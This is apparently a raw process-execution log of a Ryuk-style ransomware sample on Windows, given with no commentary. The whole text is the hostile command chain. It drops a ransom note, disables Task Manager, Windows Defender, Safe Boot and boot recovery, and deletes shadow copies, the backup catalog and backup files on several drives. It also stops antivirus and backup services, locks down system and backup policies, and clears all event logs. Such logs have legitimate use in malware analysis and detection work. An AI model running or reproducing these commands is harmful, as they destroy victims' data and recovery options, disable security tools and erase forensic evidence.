C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AMSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AirSpaceChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "FirstUXPerf-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "General Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "IHM_DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceMFT"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationFrameServer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProcD3D"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationAsyncWrapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationContentProtection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDS"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMP4"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMediaEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformanceCore"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationSrcPrefetch"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"

C:\Windows\system32\wevtutil.exe

